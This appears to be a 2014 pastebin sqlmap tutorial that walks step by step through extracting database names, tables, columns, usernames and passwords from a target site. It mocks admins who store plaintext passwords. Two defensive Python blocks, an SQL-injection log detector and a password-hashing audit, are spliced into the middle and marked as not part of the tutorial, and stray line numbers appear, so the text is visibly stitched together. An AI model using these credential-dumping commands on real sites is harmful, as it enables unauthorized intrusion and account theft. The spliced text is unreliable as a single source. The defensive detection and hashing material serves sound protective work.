An0nGrim

Sqlmap tutorial by @An0nGrim

Apr 8th, 2014
Tutorial on how to use sqlmap by:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
..::::::::::..
..:::aad88888888baa:::..
.::::d:?888888888888?::8b::::.
.:::d8888:?888888888??a888888b:::.
.:::d8888888a88888888aa8888888888b:::.
::::dP::::::::888888888888::::::::Yb::::
::::dP:::::::::Y8888888888P:::::::::Yb::::
::::d8:::::::::::Y88888888P:::::::::::8b::::
.::::88::@:::::::::Y888888P::@:::::::::88::::.
:::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaaad8P:::::
:::::::Y88888888888P::|::Y888888888888P:::::::
::::::::::::::::888:::|:::888:::::::::::::::::
':::::::::::::::8888888888888b:::::::::::::::'
:::::::::::::::88888888888888:::::::::::::::
:::::::::::::d88888888888888::::::::::::::
::::::::::::88::88::88:::88:::::::::::::
'::::::::::88::88::88:::88:::::::::::'
':::::::::88::88::P::::88::::::::::'
':::::::88::88:::::::88::::::::'
''::::::::::::::::::::::::''
'':::::::::::::::''
@An0nGrim
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
sqlmap is an almost fully automated sql database penetration tool.
time to get started XD

the first command we're going to use will scan the target for vulns

sqlmap -u "http://www.hackme.com/index.php?id=1" --dbs

obviously we would replace the url with our target's url. now sqlmap will start
scanning, in some cases it will ask if you want to skip scans to save time,
we do not want to skip scans so just type 'n'. it may also ask if you want to include
certain types of scans, we always want to say 'y'. skipping scans is being lazy and
sqlmap might say our target is not vuln because we skipped a few scans that
contained the vuln we would exploit. so never skip scans and always include all scan
types when asked.
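The step above is what this traffic looks like from the other side of the wire. As an added example that is not part of the tutorial, here is detection logic a defender would run over web-server access logs to spot automated injection probing against a parameter like `id`. The log lines are constructed (addresses, timestamps and the `hackme.com` host are made up), the `sqlmap/...` User-Agent string is assumed to be the default form the tool sends, and the `analyze`, `indicators_for` and `parse_line` names are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample of combined-format access-log lines. Addresses, times and
# the host are made up; the path mirrors the placeholder URL in the tutorial.
# The "sqlmap/..." User-Agent is the form sqlmap sends by default (assumed here).
SAMPLE_LOG = """\
198.51.100.20 - - [08/Apr/2014:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0"
198.51.100.20 - - [08/Apr/2014:10:00:09 +0000] "GET /search.php?q=o%27reilly HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0"
203.0.113.7 - - [08/Apr/2014:10:01:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [08/Apr/2014:10:01:02 +0000] "GET /index.php?id=1%27 HTTP/1.1" 500 318 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [08/Apr/2014:10:01:03 +0000] "GET /index.php?id=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [08/Apr/2014:10:01:03 +0000] "GET /index.php?id=1%20AND%201%3D2 HTTP/1.1" 200 4870 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [08/Apr/2014:10:01:04 +0000] "GET /index.php?id=1%20UNION%20ALL%20SELECT%20NULL-- HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.0.2.55 - - [08/Apr/2014:11:30:40 +0000] "GET /index.php?id=1%27 HTTP/1.1" 500 318 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/33.0.1750.152"
192.0.2.55 - - [08/Apr/2014:11:30:41 +0000] "GET /index.php?id=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/33.0.1750.152"
192.0.2.55 - - [08/Apr/2014:11:30:41 +0000] "GET /index.php?id=1%20AND%201%3D2 HTTP/1.1" 200 4870 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/33.0.1750.152"
"""

# Combined log format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators checked against each decoded query-parameter value. A single hit is
# only an indicator (apostrophes occur in legitimate input such as o'reilly); it
# becomes an alert when one source repeats indicators against the same parameter.
INDICATORS = {
    "quote": re.compile(r"'"),
    "comment": re.compile(r"--|/\*|#"),
    "tautology": re.compile(r"\b(?:and|or)\b\s+\d+\s*=\s*\d+", re.I),
    "union": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "time_based": re.compile(r"\b(?:sleep|benchmark|waitfor)\b", re.I),
}


def parse_line(line):
    """Return the fields of one combined-format log line, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def indicators_for(target):
    """Yield (path, param, label) for every indicator found in the request's query string."""
    parts = urlsplit(target)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for label, rx in INDICATORS.items():
            if rx.search(value):
                yield parts.path, name, label


def analyze(log_text, threshold=3):
    """Scan log text; return alerts for sqlmap User-Agents and per-parameter probe bursts."""
    hits = defaultdict(list)   # (ip, path, param) -> indicator labels seen
    sqlmap_ips = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["ua"].lower().startswith("sqlmap/"):
            sqlmap_ips.add(rec["ip"])
        for path, param, label in indicators_for(rec["target"]):
            hits[(rec["ip"], path, param)].append(label)
    alerts = [{"ip": ip, "reason": "sqlmap_user_agent"} for ip in sorted(sqlmap_ips)]
    for (ip, path, param), labels in sorted(hits.items()):
        if len(labels) >= threshold:
            alerts.append({"ip": ip, "reason": "sqli_probe_burst", "path": path,
                           "param": param, "indicators": sorted(set(labels))})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
</```

On the sample log this raises three alerts: a User-Agent match for 203.0.113.7 and a probe burst against `/index.php?id` from both 203.0.113.7 and 192.0.2.55, while the single apostrophe in the legitimate `q=o'reilly` search stays below the threshold. The second source shows why the User-Agent check is only a convenience: a scanner can present a browser User-Agent, so the per-source, per-parameter burst rule is the one that matters. Detection is the backstop; the reason sqlmap finds anything at all is that `id` is concatenated into a query, and parameterized queries remove that class of finding entirely.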

sqlmap will output our target's database names in a format similar to the one below.
if the output contains the "information_schema" db then navigating through
the database should be a breeze. however if it does not contain it you will
end up having to bruteforce your way through the database to get table names
and column names.
+-------------------+
|information_schema |
|database_name      |
|test_db            |
+-------------------+
sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" --tables

this command will list the tables of the database you selected. when you select a database you
do not want to select "information_schema": most of its data requires "root" to access, or in other
words you will need to be an admin to read the data.

+-------------------+
|products           |
|random_shit        |
|users              |
+-------------------+

above we have an example of a table list. the primary table we are going to access is the "users"
table so we type the following:

sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" --columns

this command will list the columns inside the table. the output from sqlmap will look sorta like
the one below.

  70.  
  71. +-------------------+
  72. |id |
  73. |user_name |
  74. |full_name |
  75. |location |
  76. |ip_address |
  77. |last_name |
  78. |password |
  79. +-------------------+
  80.  
  81. above is an example of what you will see when retrieveing the collumns.
  82. the main ones we want to access are the ones that contain the username and password,
  83. the command to access the data in the columns is below.
  84.  
  85. i find it easy to open a few new terminal windows and access the usernames and passwords at the
  86. same time.
  87.  
  88. sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" -C "user_name" --dump
  89. sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" -C "password" --dump
  90.  
now the output will be the same as the others except with usernames

+-------------------+
|admin              |
|user1              |
|user2              |
+-------------------+


and there are 2 outcomes for the password output:
outcome1:

+-------------------+
|admin              |
|irrandom           |
|iamhomo69          |
+-------------------+

outcome2:

+--------------------------------+
|c02b7d24a066adb747fdeb12deb21bfa|
|96e79218965eb72c92a549dd5a330112|
|f1981e4bd8a0d6d8462016d2fc6276b3|
+--------------------------------+

as shown in outcome1 the dumbass admin has not encrypted his
passwords (lulz) so logging in won't be a problem, however in outcome2
we have encrypted passwords which means we will have to wait to decrypt them.

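As an added example that is not part of the tutorial, here is the defender-side counterpart to these two outcomes. The outcome2 values are 32 hex digits, the length of an MD5 digest, so what is stored there is a bare hash rather than anything encrypted, and a bare fast hash without a salt is what makes offline cracking cheap. The block audits a password column the way an internal review would, flagging plaintext and bare digests, and shows the storage scheme that replaces both: PBKDF2-HMAC-SHA256 with a random per-user salt and a constant-time comparison on login. The `pbkdf2_sha256$...` storage string format is this example's own convention, `PLAINTEXT_DUMP` is constructed (two values from outcome1 plus one made up), and `HEX_DUMP` reuses the three values printed in outcome2.

```python
import hashlib
import hmac
import os
import re

# Constructed sample columns. PLAINTEXT_DUMP mirrors outcome1 (the tutorial's
# "admin"/"irrandom" plus one made-up value); HEX_DUMP reuses the three
# 32-hex-digit values shown in outcome2.
PLAINTEXT_DUMP = ["admin", "irrandom", "letmein"]
HEX_DUMP = [
    "c02b7d24a066adb747fdeb12deb21bfa",
    "96e79218965eb72c92a549dd5a330112",
    "f1981e4bd8a0d6d8462016d2fc6276b3",
]

# Bare hex digests of MD5 (32), SHA-1 (40) or SHA-256 (64): fast and unsalted,
# so a wordlist or precomputed table attacks every row at once.
BARE_DIGEST_RE = re.compile(r"^[0-9a-f]{32}$|^[0-9a-f]{40}$|^[0-9a-f]{64}$", re.I)

# Storage format used by this example (an assumption of the example, not a standard):
#   pbkdf2_sha256$<iterations>$<salt hex>$<derived key hex>
KDF_PREFIX = "pbkdf2_sha256$"


def classify(stored):
    """Classify one stored password value for an audit."""
    if stored.startswith(KDF_PREFIX) and stored.count("$") == 3:
        return "salted_kdf"
    if BARE_DIGEST_RE.match(stored):
        return "unsalted_hex_digest"
    return "plaintext_or_unknown"


def audit_password_column(values):
    """Count how each value in an exported password column is stored."""
    counts = {"plaintext_or_unknown": 0, "unsalted_hex_digest": 0, "salted_kdf": 0}
    for v in values:
        counts[classify(v)] += 1
    return counts


def hash_password(password, iterations=600_000):
    """Derive a per-user salted, deliberately slow hash suitable for storage."""
    salt = os.urandom(16)  # fresh random salt per password, stored alongside it
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{KDF_PREFIX}{iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute the derivation with the stored salt and compare in constant time."""
    try:
        scheme, iterations, salt_hex, dk_hex = stored.split("$")
        if scheme + "$" != KDF_PREFIX:
            return False
        salt = bytes.fromhex(salt_hex)
        expected = bytes.fromhex(dk_hex)
        iterations = int(iterations)
    except ValueError:  # wrong field count, bad hex or non-numeric count
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(dk, expected)


if __name__ == "__main__":
    print("outcome1-style column:", audit_password_column(PLAINTEXT_DUMP))
    print("outcome2-style column:", audit_password_column(HEX_DUMP))
    record = hash_password("correct horse battery staple")
    print("stored as:", classify(record), "verify:", verify_password("correct horse battery staple", record))
```

Two things the audit makes visible: every row of an outcome2-style column shares the same cost to attack, because without a salt one guess is checked against all rows at once, and the iteration count is what turns each guess from microseconds into a deliberate fraction of a second. PBKDF2 is used here because it ships in the standard library; a memory-hard function such as scrypt or Argon2 is the stronger choice where it is available.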
in my next tut i will explain password cracking in a nutshell (identifying different types
of encryption and decrypting them)

if you have problems with the tutorial just message me what the problem is and i will correct
the issue

if you want to contact me you can get me on twitter:

AnonGrim
@An0nGrim

@An0nGrim